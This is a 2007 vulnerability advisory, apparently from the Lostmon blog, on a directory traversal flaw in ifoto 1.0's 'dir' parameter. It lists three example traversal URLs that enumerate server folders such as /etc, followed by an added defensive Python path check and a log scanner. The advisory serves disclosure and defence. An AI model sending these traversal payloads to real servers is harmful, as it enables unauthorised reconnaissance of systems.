ifoto traversal folder enumeration

Wednesday, July 25, 2007
#################################################
ifoto traversal folder enumeration
Vendor url: http://ifoto.ireans.com/
Advisory: http://lostmon.blogspot.com/2007/07/ifoto-traversal-folder-enumeration.html
Vendor notified: no
Exploit included: yes
Secunia: SA26186
BID: 25065
SecWatch: SWID1018593
#################################################


ifoto contains a flaw that allows remote traversal and
arbitrary folder enumeration. The flaw exists because the
application does not validate the 'dir' variable before
using it in the 'index.php' script. A remote user could
create a specially crafted URL containing '../' directory
traversal sequences to view the folder structure of the
target system with the privileges of the web service.



################
versions
################

ifoto 1.0


################
Solution:
################

No solution was available at this time!!!

################
TimeLine
################

Discovered: 18-07-2007
vendor notify:---
vendor response:---
disclosure:25-07-2007


#####################
Examples
#####################


http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../
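As an added defensive example (not part of the original advisory or of ifoto's own code), the Python below shows the containment check a fix for the 'dir' parameter needs, and reuses the same rule to flag requests of the shapes shown above in constructed web-server log lines; the album root path and the log lines are assumptions.

```python
import os
import re
from typing import List, Optional
from urllib.parse import unquote

# Assumed album root; the real ifoto directory layout is not known.
ALBUM_ROOT = "/var/www/ifoto/albums"

def resolve_album_dir(user_dir: str, root: str = ALBUM_ROOT) -> Optional[str]:
    """Canonicalise a user-supplied 'dir' value under root; None if it escapes.
    Purely lexical (normpath) so it runs offline; on a live tree add
    os.path.realpath so symlinks cannot bypass the containment check."""
    decoded = unquote(user_dir)  # also covers %2F / %2E style encodings
    if "\0" in decoded or decoded.startswith(("/", "\\")):
        return None  # null bytes and absolute paths are never album names
    candidate = os.path.normpath(os.path.join(root, decoded))
    if candidate != root and not candidate.startswith(root + os.sep):
        return None  # resolved outside the album root
    return candidate

# Constructed access-log lines modelled on the request shapes in the advisory.
ACCESS_LOG = """\
10.0.0.5 - - [25/Jul/2007:10:01:02 +0000] "GET /ifoto/?dir=summer2007 HTTP/1.1" 200 4123
10.0.0.9 - - [25/Jul/2007:10:01:07 +0000] "GET /ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.1" 200 812
10.0.0.9 - - [25/Jul/2007:10:01:09 +0000] "GET /ifoto/index.php?dir=../../../../../../ HTTP/1.1" 200 790
10.0.0.7 - - [25/Jul/2007:10:02:00 +0000] "GET /ifoto/?dir=trip..2006 HTTP/1.1" 200 3005
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_traversal_requests(log_text: str) -> List[str]:
    """Return request URLs whose 'dir' parameter would escape ALBUM_ROOT."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = m.group(1)
        query = url.partition("?")[2]
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            # Reuse the fix's containment rule, so a dotted but in-root
            # name such as 'trip..2006' is not reported as a false positive.
            if name == "dir" and resolve_album_dir(value) is None:
                hits.append(url)
                break
    return hits
```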


################# End ############################


--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what sets the mind in motion....